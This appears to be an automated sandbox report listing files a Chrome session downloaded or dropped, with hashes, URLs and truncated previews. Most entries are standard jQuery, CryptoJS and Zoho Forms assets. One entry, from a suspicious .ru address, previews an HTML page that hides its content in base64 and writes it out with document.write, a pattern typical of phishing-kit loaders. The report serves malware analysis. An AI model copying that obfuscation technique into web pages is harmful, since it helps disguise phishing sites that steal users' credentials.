                            Preview:!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):jQuery)}(function(a){var b=function(){if(a&&a.fn&&a.fn.select2&&a.fn.select2.amd)var b=a.fn.select2.amd;var c;return function(){var a,c,d;b&&b.requirejs||(b?c=b:b={},function(b){function e(a,b){return u.call(a,b)}function f(a,b){var c,d,e,f,g,h,i,j,k,l,m,n=b&&b.split("/"),o=s.map,p=o&&o["*"]||{};if(a&&"."===a.charAt(0))if(b){for(g=(a=a.split("/")).length-1,s.nodeIdCompat&&w.test(a[g])&&(a[g]=a[g].replace(w,"")),a=n.slice(0,n.length-1).concat(a),k=0;k<a.length;k+=1)if("."===(m=a[k]))a.splice(k,1),k-=1;else if(".."===m){if(1===k&&(".."===a[2]||".."===a[0]))break;k>0&&(a.splice(k-1,2),k-=2)}a=a.join("/")}else 0===a.indexOf("./")&&(a=a.substring(2));if((n||p)&&o){for(k=(c=a.split("/")).length;k>0;k-=1){if(d=c.slice(0,k).join("/"),n)for(l=n.length;l>0;l-=1)if((e=o[n.slice(0,l).join("/")])&&(e=e[d])){f=e,h=k;break}if(f)break;!i&&p&&p[d]&&(i=p[d],j=k)}!f&&i&&(f=i,h=j),f&&(c.spl
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:downloaded
                            Size (bytes):135505
                            Entropy (8bit):5.284419983090413
                            Encrypted:false
                            SSDEEP:
                            MD5:930D967635E49169A36E5F4987D9527D
                            SHA1:81DEF149555A2E8422C6DB8CF1F65171EC659154
                            SHA-256:D5A5D3232463A25F85D10F82FB00D56F7D3D634C8B2E8657C141C719CCF7C77F
                            SHA-512:C277EE7A581A2F649193AE213A28FE30D64160F1F45A8EDAC1040171BF803B1FAE372694450074AD1A6A4DB5272B5634FD441DF55D7A793789803BE50CDE4EAE
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/forms/js/fullpageformlive.930d967635e49169a36e5f4987d9527d.js
                            Preview:var ZFFullPageForm={menuItemsSpeed:350,inputClearAnimationSpeed:500,errorHideTimeOut:4e3,errorSlideDownSpeed:100,errorSlideUpSpeed:200},ZFPageTitle={},ZFPageAnimation={animType:1,pageFadeInSpeed:600,footerFadeInSpeed:600,pageFadeOutSpeed:400,footerFadeOutSpeed:400,pageLoadSpeed:100,fieldFadeOutSpeed:500,fieldFadeInSpeed:800,pageNavbarAnimTime:400};function init(isFormLoad){ZFFullPageForm.isCssHasSupported=isCssSelectorSupportedInBrowser("div:has(input)"),floatingFormComponentsHandler(),checkAndAddMiniContClass(),ZFLive.isFormPdf||(initPageHeader(isFormLoad),window.addEventListener("unload",function(e){window.scrollTo(0,0)}),isFormLoad&&(setMaxWidthForDescriptionFieldImages($("div[elname=livefield-elem][reltype=parent]:visible:first").width()),bindWindowResizeEvent(),bindEventForClearIconShowOrHide($(ZFLive.formFormFieldsOuterWrapper)),showFormFirstPageComponents(),bindEvntInFirstPageSignatureComp($("div[elname=formBodyULName][page_no=1]"))))}function showFormFirstPageComponents(){$("di
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:downloaded
                            Size (bytes):399500
                            Entropy (8bit):5.239738458435766
                            Encrypted:false
                            SSDEEP:
                            MD5:8F7FCFB5F86F801426DAD6CD0C254947
                            SHA1:1DFF695687E6BE4F8426F60AD3AF9289A6E5486E
                            SHA-256:D470670D860D232937D6433268C701BE016C90E8EC91652039D0FEB2A2A16231
                            SHA-512:7CC00D24639AB2FAAD21F19DD9FFA2ABD69BDA594DF907CA2D09B48784273EBF472A5B03943233CF7AAD3B1D97C7B1225F7EF3270F28F05EBD46D27AE738D541
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/forms/css/fullpageformlive.8f7fcfb5f86f801426dad6cd0c254947.css
                            Preview:@charset "UTF-8";.ui-widget-content{.background-color:#ffffff;.background-image:none;.border:none;..-webkit-border-radius:2px;.-moz-border-radius:2px;.border-radius:2px;}.ui-corner-all{.-webkit-border-radius:2px;.-moz-border-radius:2px;.border-radius:2px;}.ui-datepicker-month:after, .ui-datepicker-month:before { top: 38%; border: solid transparent; content: " "; height: 0; width: 0; position: absolute; pointer-events: none; right: 10px;}.ui-datepicker-month:before { border-color: rgba(255, 255, 255, 0); border-top-color: #444444; border-width: 5px; margin-right: -5px;}.ui-datepicker-month:after { border-color: rgba(255, 255, 255, 0); border-top-color: #fff; border-width: 3px; margin-right: -3px;}.ui-widget-header{.background-color:#ffffff;.background-image:none;.border:none;.height:29px;}.ui-state-default, .ui-widget-content .ui-state-default, .ui-widget-header .ui-state-default{.background-color:#ffffff;..background-image:none;.color:#76
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with no line terminators
                            Category:downloaded
                            Size (bytes):16
                            Entropy (8bit):3.875
                            Encrypted:false
                            SSDEEP:
                            MD5:46DF3E5E2D15256CA16616EBFDA5427F
                            SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                            SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                            SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                            Malicious:false
                            Reputation:unknown
                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAlaegyzRRGBcBIFDZFhlU4=?alt=proto
                            Preview:CgkKBw2RYZVOGgA=
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65536), with no line terminators
                            Category:dropped
                            Size (bytes):330235
                            Entropy (8bit):5.207902711375127
                            Encrypted:false
                            SSDEEP:
                            MD5:44E2E575A610118280A724AE6837B339
                            SHA1:0177B8786D2719A38849E9FFCAC77C906C9958F9
                            SHA-256:E766BA241EF9FF67445D35A496D90D301CFFEEE2A5B881DEA550074F363A0EDC
                            SHA-512:3C024ABAC4B4479A591E864A745987B0962C8E39B78A78975A60D9E8E9A3FDCBF9709995F2C74E53B0A1F9A9108129A07CFC8343FCD5D5E859388843CF74790A
                            Malicious:false
                            Reputation:unknown
                            Preview:!function(factory){"function"==typeof define&&define.amd?define(["jquery"],factory):factory(jQuery)}(function($){var uuid,removeData,eventType,orig;function focusable(element,isTabIndexNotNaN){var map,mapName,img,nodeName=element.nodeName.toLowerCase();return"area"===nodeName?(mapName=(map=element.parentNode).name,!(!element.href||!mapName||"map"!==map.nodeName.toLowerCase())&&(!!(img=$("img[usemap='#"+mapName+"']")[0])&&visible(img))):(/^(input|select|textarea|button|object)$/.test(nodeName)?!element.disabled:"a"===nodeName&&element.href||isTabIndexNotNaN)&&visible(element)}function visible(element){return $.expr.filters.visible(element)&&!$(element).parents().addBack().filter(function(){return"hidden"===$.css(this,"visibility")}).length}$.ui=$.ui||{},$.extend($.ui,{version:"1.11.4",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38}}),$.fn.extend({scrollParent:function(includeHidd
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):3.990210155325004
                            Encrypted:false
                            SSDEEP:
                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                            Malicious:false
                            Reputation:unknown
                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (48316), with no line terminators
                            Category:dropped
                            Size (bytes):48316
                            Entropy (8bit):5.6346993394709
                            Encrypted:false
                            SSDEEP:
                            MD5:2CA03AD87885AB983541092B87ADB299
                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                            Malicious:false
                            Reputation:unknown
                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                            Category:downloaded
                            Size (bytes):89265
                            Entropy (8bit):5.289321700014546
                            Encrypted:false
                            SSDEEP:
                            MD5:5598E1E583C1D09FC270B76B7BC87FED
                            SHA1:44876173255BCAD92968AA09D26EB7361BD56369
                            SHA-256:E26F12C5C9B90FCACCE612148FBBDD171302587188E66FF2511F8D1582D91A6E
                            SHA-512:7477B0F707BAC1A59712A1EC7C3C8F2694D66CFDD46C02CAD1B48C35DE7697CEE5F30C391B1D54688C4A5575DE1D9D4BD23042CB24F1083167EDA7B9693FABF0
                            Malicious:false
                            Reputation:unknown
                            URL:https://static.zohocdn.com/forms/js/formstplivejs.5598e1e583c1d09fc270b76b7bc87fed.js
                            Preview:!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.5.1",
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 26 x 97, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.002585360278503
                            Encrypted:false
                            SSDEEP:
                            MD5:1F26E1A4C8F6BBC1E5B88B1679CDB2BC
                            SHA1:0FABE92FC4F49B6AA8B3B09F6E9221192812158B
                            SHA-256:6DEB601C4D41BF7E021632E83DD949364FD1FE59867A4A6D16BD93ADEA9156D6
                            SHA-512:E245B3B024E760AB8F7FB912F3B44C4171001EDBB99CA8A5A196837B400C4350CB19D1260CE108B5CDE61866BE7C75F4AA5B5807C94C5366B4BD39FD045003F5
                            Malicious:false
                            Reputation:unknown
                            Preview:.PNG........IHDR.......a.....G.&.....IDAT.....$.....IEND.B`.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with very long lines (7549), with CRLF line terminators
                            Category:downloaded
                            Size (bytes):20017
                            Entropy (8bit):5.871094263612563
                            Encrypted:false
                            SSDEEP:
                            MD5:DF022577D5AF485040459113C9D9E623
                            SHA1:A2A6E9B21838C8CA3753DF1D15DACF93FC6286AE
                            SHA-256:EEA7C5336F52C4772A8146FEE7AB539ACFD9A902C0E873E1961212770C2F64FC
                            SHA-512:AE0F396F0B61E0DCA10E82D7F80E4B49EF161050095674F035B153322604DC9CFFFCD3ABF316C13BFD5E07BBEDE1A673649BD6F866B8998A25770E56F81CBCAD
                            Malicious:false
                            Reputation:unknown
                            URL:https://dmk.erbirkinarinf.ru/ufPlTO2Y/
                            Preview: Success is not the key to happiness. Happiness is the key to success. -->....<script>....if(atob("aHR0cHM6Ly9EbWsuZXJiaXJraW5hcmluZi5ydS91ZlBsVE8yWS8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICN
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65447)
                            Category:dropped
                            Size (bytes):89501
                            Entropy (8bit):5.289893677458563
                            Encrypted:false
                            SSDEEP:
                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                            Malicious:false
                            Reputation:unknown
                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                            No static file info